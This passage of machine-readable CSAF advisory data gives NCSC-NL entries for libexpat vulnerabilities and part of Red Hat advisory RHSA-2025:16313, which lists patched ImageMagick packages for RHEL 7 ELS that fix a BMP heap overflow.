"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-58057 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-58057.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-58057"
},
{
"cve": "CVE-2025-59375",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"notes": [
{
"category": "other",
"text": "Allocation of Resources Without Limits or Throttling",
"title": "CWE-770"
},
{
"category": "description",
"text": "A memory amplification vulnerability in libexpat (CVE-2025-59375) allows excessive memory allocations from crafted XML input, affecting versions prior to 2.7.2, while a Security-in-Depth issue exists in Oracle Database Server\u0027s Perl component but is not exploitable.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-59375 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-59375.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-59375"
}
]
}
rhsa-2025:16313
Vulnerability from csaf_redhat
Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for ImageMagick is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "ImageMagick is an image display and manipulation tool for the X Window System that can read and write multiple image formats.\n\nSecurity Fix(es):\n\n* imagemagick: ImageMagick (WriteBMPImage): 32-bit integer overflow when writing BMP scanline stride ? heap buffer overflow (CVE-2025-57803)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2025:16313",
"url": "https://access.redhat.com/errata/RHSA-2025:16313"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2391093",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2391093"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2025/rhsa-2025_16313.json"
}
],
"title": "Red Hat Security Advisory: ImageMagick security update",
"tracking": {
"current_release_date": "2025-09-25T15:19:14+00:00",
"generator": {
"date": "2025-09-25T15:19:14+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.8"
}
},
"id": "RHSA-2025:16313",
"initial_release_date": "2025-09-22T05:39:13+00:00",
"revision_history": [
{
"date": "2025-09-22T05:39:13+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2025-09-22T05:39:13+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-09-25T15:19:14+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Server (v. 7 ELS)",
"product": {
"name": "Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:rhel_els:7"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product": {
"name": "Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:rhel_els:7"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-0:6.9.10.68-9.el7_9.src",
"product": {
"name": "ImageMagick-0:6.9.10.68-9.el7_9.src",
"product_id": "ImageMagick-0:6.9.10.68-9.el7_9.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick@6.9.10.68-9.el7_9?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-0:6.9.10.68-9.el7_9.ppc",
"product": {
"name": "ImageMagick-0:6.9.10.68-9.el7_9.ppc",
"product_id": "ImageMagick-0:6.9.10.68-9.el7_9.ppc",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick@6.9.10.68-9.el7_9?arch=ppc"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc",
"product": {
"name": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc",
"product_id": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-debuginfo@6.9.10.68-9.el7_9?arch=ppc"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc",
"product": {
"name": "ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc",
"product_id": "ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-c%2B%2B@6.9.10.68-9.el7_9?arch=ppc"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc",
"product": {
"name": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc",
"product_id": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-c%2B%2B-devel@6.9.10.68-9.el7_9?arch=ppc"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc",
"product": {
"name": "ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc",
"product_id": "ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-devel@6.9.10.68-9.el7_9?arch=ppc"
}
}
}
],
"category": "architecture",
"name": "ppc"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-0:6.9.10.68-9.el7_9.ppc64",
"product": {
"name": "ImageMagick-0:6.9.10.68-9.el7_9.ppc64",
"product_id": "ImageMagick-0:6.9.10.68-9.el7_9.ppc64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick@6.9.10.68-9.el7_9?arch=ppc64"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-perl-0:6.9.10.68-9.el7_9.ppc64",
"product": {
"name": "ImageMagick-perl-0:6.9.10.68-9.el7_9.ppc64",
"product_id": "ImageMagick-perl-0:6.9.10.68-9.el7_9.ppc64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-perl@6.9.10.68-9.el7_9?arch=ppc64"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc64",
"product": {
"name": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc64",
"product_id": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-debuginfo@6.9.10.68-9.el7_9?arch=ppc64"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc64",
"product": {
"name": "ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc64",
"product_id": "ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-c%2B%2B@6.9.10.68-9.el7_9?arch=ppc64"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc64",
"product": {
"name": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc64",
"product_id": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-c%2B%2B-devel@6.9.10.68-9.el7_9?arch=ppc64"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc64",
"product": {
"name": "ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc64",
"product_id": "ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-devel@6.9.10.68-9.el7_9?arch=ppc64"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-doc-0:6.9.10.68-9.el7_9.ppc64",
"product": {
"name": "ImageMagick-doc-0:6.9.10.68-9.el7_9.ppc64",
"product_id": "ImageMagick-doc-0:6.9.10.68-9.el7_9.ppc64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-doc@6.9.10.68-9.el7_9?arch=ppc64"
}
}
}
],
"category": "architecture",
"name": "ppc64"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-0:6.9.10.68-9.el7_9.s390",
"product": {
"name": "ImageMagick-0:6.9.10.68-9.el7_9.s390",
"product_id": "ImageMagick-0:6.9.10.68-9.el7_9.s390",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick@6.9.10.68-9.el7_9?arch=s390"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.s390",
"product": {
"name": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.s390",
"product_id": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.s390",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-debuginfo@6.9.10.68-9.el7_9?arch=s390"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-c++-0:6.9.10.68-9.el7_9.s390",
"product": {
"name": "ImageMagick-c++-0:6.9.10.68-9.el7_9.s390",
"product_id": "ImageMagick-c++-0:6.9.10.68-9.el7_9.s390",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-c%2B%2B@6.9.10.68-9.el7_9?arch=s390"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.s390",
"product": {
"name": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.s390",
"product_id": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.s390",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-c%2B%2B-devel@6.9.10.68-9.el7_9?arch=s390"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-0:6.9.10.68-9.el7_9.s390",
"product": {
"name": "ImageMagick-devel-0:6.9.10.68-9.el7_9.s390",
"product_id": "ImageMagick-devel-0:6.9.10.68-9.el7_9.s390",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-devel@6.9.10.68-9.el7_9?arch=s390"
}
}
}
],
"category": "architecture",
"name": "s390"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-0:6.9.10.68-9.el7_9.s390x",
"product": {
"name": "ImageMagick-0:6.9.10.68-9.el7_9.s390x",
"product_id": "ImageMagick-0:6.9.10.68-9.el7_9.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick@6.9.10.68-9.el7_9?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-perl-0:6.9.10.68-9.el7_9.s390x",
"product": {
"name": "ImageMagick-perl-0:6.9.10.68-9.el7_9.s390x",
"product_id": "ImageMagick-perl-0:6.9.10.68-9.el7_9.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-perl@6.9.10.68-9.el7_9?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.s390x",
"product": {
"name": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.s390x",
"product_id": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-debuginfo@6.9.10.68-9.el7_9?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-c++-0:6.9.10.68-9.el7_9.s390x",
"product": {
"name": "ImageMagick-c++-0:6.9.10.68-9.el7_9.s390x",
"product_id": "ImageMagick-c++-0:6.9.10.68-9.el7_9.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-c%2B%2B@6.9.10.68-9.el7_9?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.s390x",
"product": {
"name": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.s390x",
"product_id": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-c%2B%2B-devel@6.9.10.68-9.el7_9?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-0:6.9.10.68-9.el7_9.s390x",
"product": {
"name": "ImageMagick-devel-0:6.9.10.68-9.el7_9.s390x",
"product_id": "ImageMagick-devel-0:6.9.10.68-9.el7_9.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-devel@6.9.10.68-9.el7_9?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-doc-0:6.9.10.68-9.el7_9.s390x",
"product": {
"name": "ImageMagick-doc-0:6.9.10.68-9.el7_9.s390x",
"product_id": "ImageMagick-doc-0:6.9.10.68-9.el7_9.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-doc@6.9.10.68-9.el7_9?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-0:6.9.10.68-9.el7_9.x86_64",
"product": {
"name": "ImageMagick-0:6.9.10.68-9.el7_9.x86_64",
"product_id": "ImageMagick-0:6.9.10.68-9.el7_9.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick@6.9.10.68-9.el7_9?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-c++-0:6.9.10.68-9.el7_9.x86_64",
"product": {
"name": "ImageMagick-c++-0:6.9.10.68-9.el7_9.x86_64",
"product_id": "ImageMagick-c++-0:6.9.10.68-9.el7_9.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-c%2B%2B@6.9.10.68-9.el7_9?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-perl-0:6.9.10.68-9.el7_9.x86_64",
"product": {
"name": "ImageMagick-perl-0:6.9.10.68-9.el7_9.x86_64",
"product_id": "ImageMagick-perl-0:6.9.10.68-9.el7_9.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-perl@6.9.10.68-9.el7_9?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.x86_64",
"product": {
"name": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.x86_64",
"product_id": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-debuginfo@6.9.10.68-9.el7_9?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.x86_64",
"product": {
"name": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.x86_64",
"product_id": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-c%2B%2B-devel@6.9.10.68-9.el7_9?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-0:6.9.10.68-9.el7_9.x86_64",
"product": {
"name": "ImageMagick-devel-0:6.9.10.68-9.el7_9.x86_64",
"product_id": "ImageMagick-devel-0:6.9.10.68-9.el7_9.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-devel@6.9.10.68-9.el7_9?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-doc-0:6.9.10.68-9.el7_9.x86_64",
"product": {
"name": "ImageMagick-doc-0:6.9.10.68-9.el7_9.x86_64",
"product_id": "ImageMagick-doc-0:6.9.10.68-9.el7_9.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-doc@6.9.10.68-9.el7_9?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-0:6.9.10.68-9.el7_9.i686",
"product": {
"name": "ImageMagick-0:6.9.10.68-9.el7_9.i686",
"product_id": "ImageMagick-0:6.9.10.68-9.el7_9.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick@6.9.10.68-9.el7_9?arch=i686"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-c++-0:6.9.10.68-9.el7_9.i686",
"product": {
"name": "ImageMagick-c++-0:6.9.10.68-9.el7_9.i686",
"product_id": "ImageMagick-c++-0:6.9.10.68-9.el7_9.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-c%2B%2B@6.9.10.68-9.el7_9?arch=i686"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.i686",
"product": {
"name": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.i686",
"product_id": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-debuginfo@6.9.10.68-9.el7_9?arch=i686"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.i686",
"product": {
"name": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.i686",
"product_id": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-c%2B%2B-devel@6.9.10.68-9.el7_9?arch=i686"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-0:6.9.10.68-9.el7_9.i686",
"product": {
"name": "ImageMagick-devel-0:6.9.10.68-9.el7_9.i686",
"product_id": "ImageMagick-devel-0:6.9.10.68-9.el7_9.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-devel@6.9.10.68-9.el7_9?arch=i686"
}
}
}
],
"category": "architecture",
"name": "i686"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-0:6.9.10.68-9.el7_9.ppc64le",
"product": {
"name": "ImageMagick-0:6.9.10.68-9.el7_9.ppc64le",
"product_id": "ImageMagick-0:6.9.10.68-9.el7_9.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick@6.9.10.68-9.el7_9?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc64le",
"product": {
"name": "ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc64le",
"product_id": "ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-c%2B%2B@6.9.10.68-9.el7_9?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-perl-0:6.9.10.68-9.el7_9.ppc64le",
"product": {
"name": "ImageMagick-perl-0:6.9.10.68-9.el7_9.ppc64le",
"product_id": "ImageMagick-perl-0:6.9.10.68-9.el7_9.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-perl@6.9.10.68-9.el7_9?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc64le",
"product": {
"name": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc64le",
"product_id": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-debuginfo@6.9.10.68-9.el7_9?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc64le",
"product": {
"name": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc64le",
"product_id": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-c%2B%2B-devel@6.9.10.68-9.el7_9?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc64le",
"product": {
"name": "ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc64le",
"product_id": "ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-devel@6.9.10.68-9.el7_9?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ImageMagick-doc-0:6.9.10.68-9.el7_9.ppc64le",
"product": {
"name": "ImageMagick-doc-0:6.9.10.68-9.el7_9.ppc64le",
"product_id": "ImageMagick-doc-0:6.9.10.68-9.el7_9.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ImageMagick-doc@6.9.10.68-9.el7_9?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-0:6.9.10.68-9.el7_9.i686 as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.i686"
},
"product_reference": "ImageMagick-0:6.9.10.68-9.el7_9.i686",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-0:6.9.10.68-9.el7_9.ppc as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.ppc"
},
"product_reference": "ImageMagick-0:6.9.10.68-9.el7_9.ppc",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-0:6.9.10.68-9.el7_9.ppc64 as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.ppc64"
},
"product_reference": "ImageMagick-0:6.9.10.68-9.el7_9.ppc64",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-0:6.9.10.68-9.el7_9.ppc64le as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.ppc64le"
},
"product_reference": "ImageMagick-0:6.9.10.68-9.el7_9.ppc64le",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-0:6.9.10.68-9.el7_9.s390 as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.s390"
},
"product_reference": "ImageMagick-0:6.9.10.68-9.el7_9.s390",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-0:6.9.10.68-9.el7_9.s390x as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.s390x"
},
"product_reference": "ImageMagick-0:6.9.10.68-9.el7_9.s390x",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-0:6.9.10.68-9.el7_9.src as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.src"
},
"product_reference": "ImageMagick-0:6.9.10.68-9.el7_9.src",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-0:6.9.10.68-9.el7_9.x86_64 as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.x86_64"
},
"product_reference": "ImageMagick-0:6.9.10.68-9.el7_9.x86_64",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-c++-0:6.9.10.68-9.el7_9.i686 as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.i686"
},
"product_reference": "ImageMagick-c++-0:6.9.10.68-9.el7_9.i686",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
